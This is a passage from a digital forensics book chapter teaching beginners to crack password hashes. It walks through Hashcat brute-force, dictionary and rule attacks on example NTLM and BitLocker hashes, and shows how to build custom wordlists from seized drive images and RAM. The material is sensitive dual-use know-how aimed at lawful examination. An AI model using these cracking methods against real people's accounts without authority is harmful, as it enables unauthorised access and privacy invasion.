⁹²https://hashes.com/en/tools/hash_identifier ⁹³https://www.onlinehashcrack.com/hash-identification.php ⁹⁴https://www.kali.org/tools/hash-identifier/
  • 78. Chapter 3 - Password Cracking for Beginners 71 or ninety-five total possible characters that can be used at any point in a password, assuming they are all allowed for use in a password. So for a single character password, there are only 95 possible combinations. For a two-character password, there are 95 x 95 = 9,025 possible combinations. A three-character password has 95 x 95 x 95 (or 95³) = 857,375 combinations, a four-character has 95⁴ = 81,450,625 combinations, and a very short five-character password has an astonishing 95⁵ = 7,737,809,375 password combinations, over seven billion! Even a meager eight-character combination has over six quadrillion (a quadrillion is the name of the number just beyond trillion) possible combinations for just the eight characters alone! Not only does this show the difficulty of using every possible character, but it also shows the strength of using unusual symbols in passwords. Even with modern computing that is capable of computing thousands of possible passwords per second, it could take decades or longer to attempt to crack an eight-character password using this method using normal computers. We need a better method! So to speed up this process we need to make some assumptions about the original password rather than guessing random characters. This brings up the primary weakness and therefore the best method of attacking passwords once the examiner has the hash. Since most passwords must be remembered by the user, it is very likely to contain a word in a language that the user knows. The total number of guesses can be greatly reduced by avoiding letter combinations that are not words. The total number of words in the 2022 Oxford English dictionary is over 600,000 words, but this does include outdated, obsolete, and obscure words. Still, this is a huge improvement over even a short three-letter permutation! It is also common to add numbers or symbols to the end of the password. So we can also add numbers to the end of a valid word and try those combinations. Sophisticated users may decide to use “leet speak⁹⁵” and replace letters like ‘S’ with the number ‘5’, the letter ‘A’ with the number ‘4’, the letter ‘E’ with the number ‘3’, the letters ‘I’ or ‘l’ with the number ‘1’ because they look similar to the corresponding letter. For example, the word “Apples” may become “4pp135” when using leet speak. Finally, the addition of symbols is common at the end of the password, so common symbols like “!” can be added to the end (Picolet, 2019). This is by no means an exhaustive list, but this is a good starting point considering the alternative of a true brute force attack. ⁹⁵https://en.wikipedia.org/wiki/Leet
  • 79. Chapter 3 - Password Cracking for Beginners 72 Wordlists Now that we know a better method, we need to come up with a way to use that method to attack passwords. The simplest method would be to use a list of words or a wordlist of possible passwords. Just like it sounds, it is a list of possible passwords that already have symbols and numbers added to them. When using a wordlist to attack a password, it is often called a dictionary attack. It is possible to manually build our wordlist, but that is a very time-intensive task as we would not only need to create useful passwords but avoid duplicates. Fortunately, there are prebuilt wordlists that we can use. When companies are hacked, a part of the data that is often stolen is the passwords. Companies should encrypt their data, specifically user passwords, but this is not always the case. In 2009, the social gaming company RockYou was compromised by a SQL injection attack. The hacker was able to gain access to over 32 million accounts and they were storing passwords in the clear, which means that there was no encryption whatsoever on the passwords as they were stored in plain text (Cubrilovic, 2009). This list of passwords has become known as the rockyou list and is commonly used as a starting point for dictionary attacks. Future breaches where the passwords have been compromised and cracked have also been added to wordlists. It is important to note that a good password list will not have duplicates of passwords due to deduplication. This is a key way to save time when cracking passwords by not attempting the same password multiple times. A good online resource where wordlists are compiled and ranked is Weakpass.com⁹⁶ (W34kp455, 2014). On this site, wordlists are ranked by order of popularity and functionality from 0 to 100 and using a color-coding system that corresponds with the numerical ranking. Note how there are varying sizes of lists, ranging from over 400GB to only a few bytes in size. The first several wordlists for download may not be ranked very high being color-coded red and only being in the single digits. Selecting “Lists” and selecting “Medium” should display the original rockyou wordlist as rockyou.txt on the first page with just over 14 million unique passwords. When selecting “Lists” from the horizontal menu and selecting “All” we can sort all lists by popularity. Near the top of the list should be the cyclone.hashesorg.hashkiller.combined.txt password list with about 1.5 billion total passwords. This list is one of the top-ranked lists while only being just over 15GB in size. I would recommend using this list and I use it frequently because it is a good combination of reduced size yet it still has some complexity to crack most common passwords. The total time to iterate through the list is not unreasonable for many password hash types and stands a decent chance of cracking many passwords with a straight dictionary attack. The “All-in-One” tab allows for downloading a deduplicated version of all passwords on the site in various lengths for different applications, but know that a longer list will take longer to complete than a shorter list. If you haven’t noticed, there is also an estimated time to iterate through the list for a particular password type under each list. While this can vary widely between different computers, it does a good job of showing the relative time difference it takes to attempt that list against the different hash types. If the 15GB password list is too large for you, here⁹⁷ is a smaller list that is not posted on Weakpass. ⁹⁶https://weakpass.com/ ⁹⁷https://github.com/FullTang/AndroidPWList
  • 80. Chapter 3 - Password Cracking for Beginners 73 This list combines several of the smaller wordlists from Weakpass and uses a few other techniques for an uncompressed size that is just under 1GB in size. If you plan on installing and using Hashcat, I would strongly recommend downloading at least one list of your choice.
  • 81. Chapter 3 - Password Cracking for Beginners 74 Installing Hashcat Now that we know some of the more common methods used to create passwords, and we have access to a good list of millions of potential passwords, we can attempt to crack the example hash using Hashcat. The most recent version of Hashcat can be securely downloaded here⁹⁸ (Hashcat - Advanced Password Recovery, n.d.). Considering the type of calculations performed, it is much more efficient to use the video card of a computer to perform these calculations rather than use the CPU. This may cause some compatibility issues, and if so help on how to install Hashcat can be found on the Hashcat Discord server⁹⁹. I would encourage anyone who has not used Hashcat or even if they have not used a command-line tool to follow along at this point on their own Windows machine even if you have not extracted any hashes up to this point. We will crack the previously mentioned example hash (b4b9b02e6f09a9bd760f388b67351e2b) from Hashcat’s website here shortly! Once Hashcat is installed, it needs to be launched from the command line, or command prompt, assuming the user is using a Windows system. The simplest method to launch a command prompt window in the correct location is to navigate to where Hashcat is installed (C:WindowsProgramshashcat-6.2.5 or similar) using File Explorer, click the white area next to the path so that the path turns blue, type cmd and press enter. A black window with white text should appear. If you have never used the command line before, congratulations on opening your first terminal window! The next step is to launch Hashcat in help mode. This will also see if the correct drivers are installed to allow for Hashcat to run. Simply type hashcat.exe -h in the command prompt. It is possible that an error occurred stating an OpenCL, HIP, or CUDA installation was not found. If this is the case, I would recommend typing Device Manager in the search bar next to the Windows Start menu and then selecting Display adapters to determine the type of video card installed on the computer. Beyond this, it will require downloading the required drivers from a trusted source to continue using Hashcat. Once again, additional help on how to install Hashcat can be found on the Hashcat Discord Server¹⁰⁰. If the hashcat.exe -h is successful, then there should be a large amount of output on the screen showing options, hash modes, and examples, and should end with some links to the Hashcat website. I find it helpful to save this help information to a simple text file for easy reference. That can be done by pressing the up arrow on the keyboard to display hashcat.exe -h again, but before pressing enter add > Help.txt to the end of the command for the total command of hashcat.exe -h > Help.txt. This will create a text file in the same folder with the output from the help command which can be opened in Notepad or similar for quick reference while keeping the command prompt window free to run Hashcat. Open the Help.txt that was just created in the hashcat-6.2.5 folder. Under - [ Hash Modes ] - it shows the numerous types of hashes that can be attacked (and possibly cracked) assuming the hash is properly extracted. Scrolling to the bottom shows some example commands to run Hashcat under ⁹⁸https://hashcat.net/hashcat/ ⁹⁹https://discord.gg/vxvGEMuemw ¹⁰⁰https://discord.gg/vxvGEMuemw
  • 82. Chapter 3 - Password Cracking for Beginners 75 - [ Basic Examples ] -. Note that the first Attack-Mode is a Wordlist, but there is also a Brute- Force option. This is not a true brute force method as was discussed earlier as it does not use all the possible symbols on the keyboard nor does it use uppercase letters except for the first character. One advantage is that it does not require a dictionary or wordlist to crack a password, so it has its uses. Let’s break down this command. Under example command, the first word is hashcat. It can also be hashcat.exe. This is simple, we are just calling the executable file, but we need to give some input or arguments to the program. The next thing we see is -a and then a number followed by -m followed by another number. At the top of the help file, we see under - [ Options ] - it explains -a as the attack-mode and -m as the hash-type. Both of these are required, but the order is not an issue as they can be in either order, but we will follow the order shown in the example. Scrolling back down towards the bottom we find - [ Attack Modes ] - where it shows the types of attacks. Brute-Force is 3 while Straight is 0. Brute-Force is Hashcat’s version of brute-force that was just briefly mentioned, while Straight is a dictionary attack using a wordlist. Now for the other required argument, the -m. This stands for hash-type, so we scroll up to the bulk of the help file under - [ Hash Modes ] - and see all the different types. We know this is an NTLM hash, so we need to find the hash-type for NTLM in all of that noise. Rather than manually searching, press CTRL + F to open the find menu and type NTLM. You may get some results like NetNTLMv1, NetNTLMv1+ESS, or NetNTLMv2 and you may have to change your direction of searching to find matches, but you should be able to find just NTLM all on one line with a mode of 1000. Now that we know the required parameters for our two required arguments, onto how to input the hash itself into Hashcat. When it comes to the hash itself, Hashcat will accept the hash in one of two ways. It can either be pasted directly into the command line, or it can be put into a simple text (.txt) file with one hash and only one hash per line. If a text file containing multiple hashes is used, it needs to be all hashes of the same type, like multiple NTLM hashes or multiple SHA-256 hashes, with each hash on its own line. If attacking multiple hashes, the file method will be faster than trying to crack them one at a time but it will be slower than a single hash. Pasting directly into the command line can be faster if the hash is already extracted, but a few seconds taken to format the hash in a text file right after extraction may be better in some situations. The example command shows some arguments like ?a?a?a?a?a? after the example0.hash, but those are not required. Other arguments can be seen towards the top of the help file, but those are optional. We now know everything required to crack this example NTLM hash! b4b9b02e6f09a9bd760f388b67351e2b.
  • 83. Chapter 3 - Password Cracking for Beginners 76 “Brute-Forcing” with Hashcat Go to the command line where we typed in hashcat.exe -h and type hashcat.exe -a 3 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b and hit enter. There should be a wall of white text and then it will stop and it should show Cracked partway up on the screen! Above the Cracked notification, there will be the hash and at the end, it will show b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This means the password was hashcat, as can be seen at the top of the Hashcat Wiki webpage. If this is your first time cracking a password then congratulations! You just cracked your first password hash! Now let’s examine what Hashcat did during that wall of white text. Scrolling up we can see the first block of text similar to the block of text at the end, but instead of saying Cracked it says Exhausted. Looking at the Guess.Mask row in the first column we see a ?1 [1], and on the next row we see a Guess.Charset. On the Guess.Charset row there it shows the -1 and it is followed by a ?l?u?d. To know what those mean, we need to go back to our help file. Under - [ Built-in Charsets ] - close to the bottom we see the l showing all lowercase characters, the u showing all uppercase characters, and the d is all digits from 0 to 9. Putting it all together this means Hashcat tried all lowercase, uppercase, and digits for a password length of 1 before exhausting and moving on. Notice how at the top it showed Approaching final keyspace - workload adjusted. and that means that Hashcat realizes it is about to come to the end of its current process and it is thinking about what it needs to do next. The second block shows a Guess.Mask of ?1?2 [2]. Therefore, there was a total of two characters, but this time it is a little different. The ?2 is only the ?l and ?d meaning for the second character it only tried lowercase and digits, but for the first character it was still a ?1 so it tried lower, upper, and digits like in the first block. The third block is a Guess.Mask of ?1?2?2 [3], so three characters total but only trying uppercase, lowercase, and digits for the first and trying lowercase and digits for the other two. The fourth, fifth, and sixth blocks all show uppercase, lowercase, and digits for the first character with lowercase and digits for the rest. The seventh block is where it was cracked, using the same Guess.Mask format of ?1?2?2?2?2?2?2. The password was not long enough to see for this example, but if we didn’t crack it on seven characters it would keep getting longer, and eventually the ?3 would be used which would be added to the end which would also try the following five symbols of *!$@_ in addition to lowercase and digits for the last character.
  • 84. Chapter 3 - Password Cracking for Beginners 77 Hashcat’s Potfile This worked for this password, but for more complicated passwords we can see where it has its limitations. That is why we need a robust wordlist. So let’s try and crack this password again using a wordlist, and in doing so we will discover a useful function of Hashcat. First, find the wordlist that you previously downloaded in File Explorer and unzip it. It may not have a file extension, but Hashcat doesn’t care nor would it be likely that you could open the file in normal Notepad anyway as it is probably going to be too big for the standard version of Notepad. If you want to see the contents, you should be able to use another text editor like Notepad++ for smaller wordlists, but it is by no means required. Let’s go back to the command line where we just cracked the hash and type out a new command. Type hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b not forgetting to put a single space after the hash but don’t hit enter just yet. Hashcat needs the path for the wordlist, note how we are using -a 0 instead of -a 3. If you are savvy with the command line, you could enter the path of the file (not forgetting quotes if there are any spaces), or you could copy the path from the File Explorer window (where we typed cmd earlier to open our command prompt window) and then add the file name, but there is an easier way that some may consider cheating. If you are not cheating you are not trying, right? The easiest way is to just drag and drop the uncompressed wordlist into the black area of the command prompt window and it should populate the whole path to the file in the command line. The whole command should look something like this, hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy Downloaded Wordlist". There may or may not be quotes around the path depending on if there are spaces in the folder and subfolders or the file name. Hit enter and see what happens. It should have finished very quickly and displayed a notification of INFO: All hashes found in potfile! Use --show to display them. Well, that is interesting, what is a potfile? Simply put, the potfile is where Hashcat automatically stores hashes it cracks with the corresponding password in plain text. This is very useful to make sure that time is not wasted trying to crack passwords that have already been cracked and to make sure a cracked password is saved in case of power failure. It would be most unfortunate if a password was cracked before the examiner could see it and the power went out to the machine that was not hooked up to a Universal Power Supply due to budgetary concerns. Anyway, go to the hashcat-6.2.5 folder where hashcat.exe is located, find the file named hashcat.potfile and open using Notepad or the text editor of your choice. Assuming this is your first time using a freshly downloaded Hashcat, there will only be one entry, b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This is nice to prevent us from wasting time trying to crack it again, but we want to see how to try and crack it using other methods. Either delete the single entry from the potfile, save, and close, or just delete the whole potfile as Hashcat will automatically generate a new one upon cracking another password.
  • 85. Chapter 3 - Password Cracking for Beginners 78 Dictionary (Wordlist) Attack with Hashcat Go back to the command prompt and press the up arrow on the keyboard. Your previously typed command of hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy Downloaded Wordlist" or similar should appear. Press Enter to run the command again. Now it should start processing, but it will stop after a moment and display something like Watchdog: Temperature abort trigger set to 90c. As a side note, this is nice to know that Hashcat has built-in safety procedures to help prevent the overheating of video cards and will slow down its processing speed if the GPU (aka video card) gets too hot. Anyway, after a few seconds, it should display something like Dictionary cache building "D:My FolderMy Downloaded Wordlist": 1711225339 bytes (10.61%) with the percentage increasing every few seconds. This is normal and depending on the size of the wordlist it might take a minute or two. This is required after the first time starting a new wordlist, but as long as the location of the wordlist does not change it will not need to build the dictionary each time. Once the dictionary is built, it will display the following line: [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>. This shows what commands we can enter while it is processing. It would be nice to know what is going on, so press the s key. The first thing I look at is the Time.Estimated row and it will show an estimated end date and time and estimated duration. This is where times can vary greatly based on the type of GPU and length of the wordlist. Even if a longer wordlist was chosen, it should not take long to crack the password. This is assuming that the word “hashcat” is in the dictionary, but hopefully it is there. This method will likely take a bit longer than the brute-force method, but it is much more robust and is one of the best methods for cracking passwords. We are going to try one more method for now, so go back to the potfile and delete the most recent entry from the potfile or just delete the whole potfile.
  • 86. Chapter 3 - Password Cracking for Beginners 79 Dictionary + Rules with Hashcat The obvious weakness of the dictionary attack is the password has to be in a precompiled dictionary, but what if it is a complicated password not in a wordlist? What if the user made a password that used unusual symbols or used numbers at the beginning, used numbers instead of letters, or added an unusual number of symbols to the end? This can be cracked by Hashcat by using a combined dictionary and rule attack. Hashcat comes preloaded with rules, and additional rules can be downloaded just like wordlists can be downloaded. At this time, I have not found any rules that are noticeably superior to the rules that come standard with Hashcat but it is left up to the examiner to decide what they want to use. After deleting the most recent entry in the potfile, check the hashcat-6.2.5 folder and there should be a folder named rules. Inside the rules folder, there are plenty of prebuilt rules. My personal favorite is the onerulestorulethemall rule as the name has a nice ring to it. It is also a good rule in general, but again there is mostly personal preference and trial and error. It is worth mentioning that while these rules are only a few kilobytes in size, they can add a substantial amount of time to how long it takes to process a hash as all commands in each rule will be applied to each potential password in a wordlist. Just like with dictionary attacks, a bigger rule will take longer and yield more potential passwords but a smaller rule will be faster but with fewer generated passwords. Go back to the command prompt and press the up arrow. Adding a rule to a dictionary attack is quite easy, we just need to add a -r followed by the path to the rule file after the dictionary at the end of the command. Just add -r to the end of the command, put a space, then drag and drop the rule of your choice into the command prompt window. The command should look something like hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy Downloaded Wordlist" -r "D:hashcat-6.2.5rulesonerulestorulethemall.rule". Once syntax looks good, press enter. This time the dictionary should not have to compile, as it will display Dictionary cache hit: and then information on the location of the dictionary. Press the s key on the keyboard to see the status, and note how the Time.Estimated row has increased, possibly to a day or more. Hopefully, it will not take longer than a few minutes to crack our example hash again. This method does take longer, but again we are attacking the hash in a way that will crack more complicated passwords than the previously discussed methods.
  • 87. Chapter 3 - Password Cracking for Beginners 80 Robust Encryption Methods Up to now, we have only cracked an NTLM hash, but what about more robust encryption methods? Go to the Hashcat Example Hashes¹⁰¹ and search for Bit- Locker that should be mode 22100. The resulting hash should be as follows: $bit- locker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$3 16b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5 e17c6145bf8561ea86f52d3592059fb. This is massive compared to the NTLM hash! Try it in Hashcat using the following command: hashcat.exe -a 3 -m 22100 $bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a3 3a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5 ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb The brute-force starts at four characters because BitLocker originally required a minimum password length of four so Hashcat is smart enough to not waste time trying less than four characters when attacking a BitLocker password. For my computer, it shows an estimated time of 1 hour and 19 minutes for just 4 characters. If I let it run and go to 5 characters, it shows it will take 2 days to just try 5 characters! Your computer may have different estimated times, but unless you have a really good gaming computer or are running Hashcat on a computer designed for mining cryptocurrency you are probably seeing similar numbers. Trying the same BitLocker hash but just using a dictionary attack with no rules against the cyclone.hashesorg.hashkiller.combined dictionary shows an estimated time of 28 days! Knowing this means that if an NTLM hash was cracked using the cyclone.hashesorg.hashkiller. combined dictionary, it will take about a month at the most for the same BitLocker password to be cracked. This time can be significantly reduced by using a computer with multiple GPUs like computers used for mining cryptocurrency. This is a really good reason to not have a password that comes standard in most dictionary attacks and shows why strong and complicated passwords are important. This is just examining BitLocker, but VeraCrypt and DiskCryptor example hashes require the download of a file as it is too large to display on Hashcat’s website. This shows a substantial difference between password encryption used by Windows and robust encryption software, but it also shows why it is very important to not reuse passwords. If an attacker can compromise the weak Windows password and the same password is also used for robust encryption software then the strong encryption method is very easily defeated. It also shows how a robust encryption method can be defeated by using a good wordlist and why strong passwords are the first line of defense no matter what encryption method is used. ¹⁰¹https://hashcat.net/wiki/doku.php?id=example_hashes
  • 88. Chapter 3 - Password Cracking for Beginners 81 Complex Password Testing with Hashcat Maybe you have gotten the bug by now and our simple hash that is just “hashcat” is not good enough and you want to try even harder potential passwords. The easiest way to attempt to crack more difficult passwords is to use an NTLM hash generator. Online NTLM hash generators hosted on a website may be the easiest route, but there is a major security concern if the user wants to test their own passwords and converts them using an online tool. By using the online tool the user has likely given up their password to a third party if that online tool is logging input to their website. I would only recommend using an online tool for testing passwords that the user is not using, and I would not even use similar passwords to ones that are currently in use in an online tool. The next best method would likely be PowerShell functions¹⁰² or Python scripts¹⁰³ that can generate NTLM hashes. These links are just two possible ways to create an NTLM hash, but searching Google can find other methods as well. This is much more secure as the processing to convert the password to an NTLM hash is done on the user’s computer. Just note that if the password is cracked, it will be saved in the potfile so it would be wise to either delete the entry from the potfile or delete the potfile altogether once the testing session is complete. Searching a Dictionary for a Password Since we have already mentioned that the main weakness of a password is the existence of that password in a wordlist, it might be nice to see if our current password or other potential password shows up in a dictionary. Since these wordlists are very large, it is difficult to find a program that will open them up to do a simple Ctrl + F to search the document to find the password. Fortunately, the command line offers an easier way to search the contents of a file without opening the file. Using File Explorer, navigate to the folder where you have downloaded and uncompressed a wordlist. Open a command-line window just like we did for running Hashcat by clicking the white area next to the path so that the path turns blue, type cmd, and press enter. We are going to use the findstr command to search the contents of a dictionary. In the command line, type findstr password and then press [TAB] until the dictionary you want to search appears. The completed command should look something like findstr password MyDictionary. Press enter. If you chose a common password it should output a wall of white text showing all passwords that contain that password. If it just shows a blinking cursor, then it is searching trying to find a match. When you can type again, it has finished searching. This is a good way to check if a password exists in a dictionary or wordlist, but if the password does not show up that does not necessarily mean it can’t be cracked with that dictionary. An appropriate rule would have to be added to mangle the wordlist in a way that would cause the password to be guessed by Hashcat. Still, since dictionary attacks are the most common and the fastest method of cracking a password, it is a good yet simple test to see if the password is a strong password or not. ¹⁰²https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/ConvertTo-NTHash.md ¹⁰³https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/
  • 89. Chapter 3 - Password Cracking for Beginners 82 Generating Custom Wordlists Now I am going to move into a bit more advanced concepts and assume that the reader is somewhat familiar with forensic examinations of electronic devices. Some of the more basic concepts related to forensic exams will be overlooked when explaining these techniques, and some of the advanced concepts will only be discussed briefly. This remaining section of this chapter is simply intended to show what is possible and how it can be useful in a thorough examination. Two reasons for using custom wordlists are for attacking a particularly stubborn password (good for them for using a strong password!) or for generating a wordlist for use on forensic tools that require a static wordlist/dictionary to attack alphanumeric passwords like are used on some Android devices. As an example of how to use both of these techniques in a forensic examination, let’s say an examiner has the legal authority to examine a Windows computer and an Android phone from the same target/suspect user. Both devices are in the examiner’s possession. The drive for the computer is not encrypted with BitLocker or other methods and the examiner was able to acquire an .E01 of the hard drive from the computer, but the phone is locked with an alphanumeric password and unfortunately, we have not cracked the NTLM hash with the methods already mentioned. Because the data on the hard drive is not encrypted, there is now a wealth of information about the target including user- generated data. It is even possible that there is simply a document saved somewhere on the hard drive that contains the passwords for that user that may contain the Windows (NTLM) password and the phone password. Rather than manually looking through the contents of the hard drive, there are tools that will search the hard drive and build wordlists for us. The first tool is the AXIOM Wordlist Generator¹⁰⁴. This requires the examiner to have access to the Magnet AXIOM forensic software. The .E01 image will need to be processed With AXIOM Process and then the AXIOM Wordlist Generator can be used. Instructions for how to use the AXIOM Wordlist Generator is on their website. A free alternative that is more comprehensive but yields more false positives is to use Bulk Extractor¹⁰⁵ with the following command: bulk_extractor -E wordlist -o <output directory> <imagefile.E01>. For example, if the examiner had acquired an .E01 image of a hard drive and named the acquisition HDD.E01 and wanted to output the wordlist to a folder called Wordlist that was in the same folder as the HDD.E01 file with a terminal window open in the same directory as the HDD.E01 file, the following command would be used: bulk_extractor -E wordlist -o Wordlist HDD.E01. Bulk Extractor comes standard with a Kali Linux build, but is also available on Windows. I find it is better to use a Linux box, but to each their own. A virtual machine (VM) of Linux or other access to Kali Linux or similar can be used as nearly all Linux distributions to include Kali Linux are free. If using a Linux VM, one option is to use Virtual Box¹⁰⁶. While a VM can be used, it is not difficult to set up a USB thumb drive or an external hard drive with Kali Linux or similar and change the boot order on the computer to boot to a fully functional and persistent Kali Linux. The instructions for this procedure are on the Kali Linux website¹⁰⁷. I would recommend this second method if you are planning on further customizing wordlists by paring them down as is ¹⁰⁴https://support.magnetforensics.com/s/article/Generate-wordlists-with-the-AXIOM-Wordlist-Generator ¹⁰⁵https://www.kali.org/tools/bulk-extractor/ ¹⁰⁶https://www.virtualbox.org/ ¹⁰⁷https://www.kali.org/docs/usb/live-usb-install-with-linux/
  • 90. Chapter 3 - Password Cracking for Beginners 83 discussed in the next section, but a Kali VM will work as well. Once the wordlist is generated with the preferred method (or both methods), the NTLM password from the Windows machine can be attacked again and hopefully cracked. By using the cracked Windows password, we can then use virtualization software to log in to the suspect machine virtually and examine the saved passwords in Chrome, Edge, or other browsers. With the cracked NTLM and the saved browser passwords, we now have several potential passwords for the phone. Those exact passwords could be tried on the phone, using a forensic tool of course, but what if it was an unknown variation of those passwords? It is also possible that we have yet to crack even the NTLM password if it is a strong password. There is still hope if the keyword/baseword used in the password is in the wordlist we have generated. For example, if the target password is 123456Password!@#$%^ We just have to get rid of the noise in the custom wordlist and then mangle the wordlist in a way that will generate the target password. Kali Linux can help us with that process.
  • 91. Chapter 3 - Password Cracking for Beginners 84 Paring Down Custom Wordlists If a really strong password has been used, then it may not be cracked even with a custom-built wordlist using the AXIOM Wordlist Generator and Bulk Extractor to pull passwords from the target device. It is also possible that the password uses a word from another language. If this is the case, the examiner will need to focus their efforts even more and get rid of the “noise” in the custom wordlist. It would also be a good idea to download a list of words for the target language. This link¹⁰⁸ is a good place to start when looking for wordlists in other languages. A simple Google search should also yield results for wordlists in the target language. With all three lists (AXIOM wordlist, Bulk Extractor, and foreign language) we need to combine them into one list. A simple copy-paste can work, but the lists may be too large to open to copy them all into one file. Fortunately, Linux has a concatenate method that will combine files. After copying all the files/wordlists to Kali Linux, open up a terminal window and type the following command cat AXIOMWordlist BulkExtractorWordList ForeignLanguageWordList > CombinedWordList choosing the correct names of the files, of course. Now we run into the issue of potential duplicate lines. There are tools built into Linux that can remove these duplicate lines, by using the following commands: sort CombinedWordList | uniq -d followed by awk ‘!seen[$0]++’ CombinedWordList > CombinedWordListDedupe. The problem with this is we run into the issue of different line endings/carriage return symbols that are used by Unix vs Windows. A carriage return is simply the [Return] or [Enter] character at the end of a line that tells the operating system to start a new line. Unix uses a different carriage return character than Windows. So two lines may be identical except for the carriage return, but it won’t be recognized by normal Linux commands and there will be duplicate lines in our wordlist. There is a program called rling¹⁰⁹ that will need to be compiled on a Linux system. It is not in the normal distributions so a sudo apt install from the terminal window will not work. Certain dependencies like libdv-dev and Judy may need to be installed using the following commands: sudo apt-get update –y sudo apt-get install -y libdb-dev for libdb-dev and sudo apt-get install libjudy-dev. The rling command will then be run from the location it was compiled by using ./rling in that directory if the entire rling folder is not stored in the /usr/share folder on the Linux system after compiling the program. I would reccommend copying the rling folder to the /usr/share folder to allow it to run from the terminal window like Hashcat or Bulk Extractor so you can call the command by simply using rling from anywhere on the system. I understand that this is somewhat technical and I did not go into great detail, but this is the best and fastest method that I found for deduplication that also properly deals with carriage return issues. Once we have chosen the deduplication method of our choice, it may be useful to change the characters that have escaped HTML conversion back to their ASCII equivalents. What this means is there may be a &gt inside of the passwords but what that should be is simply a >. The way to automate this conversion is with the following command: sed -I ‘s/&gt/>/g’ WordList.txt. ¹⁰⁸https://web.archive.org/web/20120207113205/http:/www.insidepro.com/eng/download.shtml ¹⁰⁹https://github.com/Cynosureprime/rling
  • 92. Chapter 3 - Password Cracking for Beginners 85 Here¹¹⁰ is a partial list of HTML names and their ASCII equivalents. Finally, we may choose to only select potential passwords that are of a certain length. Grep can be very useful here. By using the following command grep -x ‘.{4,16}’ WordList.txt > AndroidPWLength.txt it will select only lines that are between 4 to 16 characters in length. By using the following command grep -x -E -v ‘[0-9]+’ AndroidPWLength.txt > Alphanumeric.txt it will exclude all PIN codes from the list and only select alphanumeric passwords. This final list should be a deduplicated list of possible passwords from the AXIOM wordlist, Bulk Extractor, and foreign language list that can be used against the Android device with the appropriate forensic tool. Mangling Wordlists In Place Perhaps the combined wordlist as was just mentioned still did not crack the stubborn password and the forensic tool is being used that does not allow for rules on the fly like Hashcat. If this is the case, the wordlist will need to be mangled in place before uploading the wordlist to the forensic tool. Hashcat can still be used to mangle the wordlist before uploading to the forensic tool, but it will need to be done using Linux. As was mentioned in the previous section, I prefer Kali Linux but to each their own. The following instructions are how to mangle the wordlist in place using a Kali Linux OS, but the location of the rule list may be different if using a different flavor of Linux. Copy the wordlist to a Kali Linux computer and navigate to the folder that contains the wordlist you want to mangle with the Hashcat rule of your choice. For this example, I will use Wordlist.txt and the best64.rule rule. Open up a terminal window (if you are using the GUI instead of the CLI to navigate) by right-clicking in the area inside of the folder and use the following command: hashcat --force Wordlist.txt -r /usr/share/hashcat/rules/best64.rule --stdout > Wordlist_best64.txt and hit enter. Once the iteration is complete, the file Wordlist_best64.txt will be created and will contain all of the iterations of Wordlist.txt with the best64.rule rule used against it so that a straight dictionary attack can be used. Keep in mind that this can quickly create massive files even out of smaller wordlists, so that is why I am using the much smaller rule set of base64.rule rather than the onerulestorulethemall.rule. If even the standard smaller rules create wordlists that are too big to use on the forensic tool, then custom rules can be created. For example, a file named append_exclamation.rule containing only two lines of : and $! (each on their own line) would append an exclamation point to every word in a wordlist so it would double the size of the list. More information on how to mangle wordlists using Hashcat can be found at this blog post¹¹¹. It might also be useful to make sure that there are no duplicates by using rling against the wordlist again. Additionally, if a max password length is known it would be good to use grep to remove passwords that are too long as was mentioned in the previous section. ¹¹⁰https://ascii.cl/htmlcodes.htm ¹¹¹https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/
  • 93. Chapter 3 - Password Cracking for Beginners 86 Additional Resources and Advanced Techniques Building Wordlists from RAM While it is pretty much required to have the admin password from a computer to acquire RAM, if RAM has been acquired on a system and there is a need to crack an additional password other than the known admin password, RAM can be a great resource to build a custom wordlist for that system. Once again, Linux is also a useful tool for this. The basic process is to use an uncompressed RAM capture and extract possible passwords by using the strings command to look for possible passwords. Linux can also deduplicate these possible passwords. An example command would look like strings Memory_file | sort | uniq > RAMwordlist.txt where ‘Memory_file’ is the name of the uncompressed memory image. Then the generated wordlist can be used in Hashcat just like a dictionary attack. For more info, check out a great video¹¹² on the topic by DFIRScience. Crunch for Generating Random Wordlists Crunch¹¹³ is a Kali Linux package that allows for the generation of wordlists using a predefined set of characters and only of a specific length. This can be useful if certain characters are known or if the length of the password is known. It is a bit simpler than using rules in Hashcat, it is easy to use, and it is quite useful for lists of only a few characters in length. It is similar to generating a list for brute-forcing a password which has limitations already discussed, but it can be useful. From the terminal window on a Linux machine simply type the command sudo apt install crunch to install. The example on their home page shows the command crunch 6 6 0123456789abcdef -o 6chars.txt generating a list of all combinations and permutations of all digits and the letters a-f and outputting the results to a file. Combinator Attacks and More by 13Cubed The 13Cubed YouTube channel¹¹⁴ has excellent and in-depth information on numerous digital forensics concepts. One of his videos covers how to concatenate words together to crack passwords that may consist of several words strung together. He also goes over some more advanced topics and concepts related to using Hashcat, check out the first of his two-part series on Hashcat¹¹⁵. John the Ripper John the Ripper is similar to Hashcat in many ways but where I think it really shines is for 